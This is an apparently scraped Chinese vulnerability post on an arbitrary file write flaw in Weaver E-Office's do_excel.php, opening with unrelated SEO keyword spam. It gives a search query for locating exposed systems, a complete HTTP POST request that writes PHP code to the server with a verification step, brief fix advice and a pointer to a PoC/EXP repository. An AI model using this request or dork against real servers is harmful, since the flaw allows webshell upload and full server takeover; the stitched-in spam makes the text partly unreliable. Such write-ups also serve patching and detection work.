外贸公司英文网站怎么做,长沙网络营销品牌排名,wordpress怎样设置友情链接,汽车营销服务网站建设》》》产品描述《《《 泛微0-0fice是一款标准化的协同 OA办公软件#xff0c;泛微协同办公产品系列成员之一,实行通用化产品设计#xff0c;充分贴合企业管理需求#xff0c;本着简洁易用、高效智能的原则#xff0c;为企业快速打造移动化、无纸化、数字化的办公平台。 》》… 》》》产品描述《《《 泛微0-0fice是一款标准化的协同 OA办公软件泛微协同办公产品系列成员之一,实行通用化产品设计充分贴合企业管理需求本着简洁易用、高效智能的原则为企业快速打造移动化、无纸化、数字化的办公平台。 》》》漏洞描述《《《 泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验攻击者可以通过构造特定的请求将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件如 WebShel 或系统脚本从而在服务器上执行任意命令访问敏感数据甚至完全接管服务器。此漏洞严重威胁系统安全可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。 》》》搜索语句《《《
app泛微-EOffice 》》》漏洞复现《《《
POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alivehtml?php echo md5(1);unlink(__FILE__);?测试文件地址:/general/charge/charge list/excel.php 如果能解析php代码则存在漏洞 》》》修复建议《《《
1、如非必要禁止公网访问该系统。 2、通过防火墙等安全设备设置访问策略设置白名单访问。 3、升级产品到最新版本 ------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------- 更多最新0day/1day POCEXP移步-----Kelichen1113/POC-EXP (github.com) ------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------
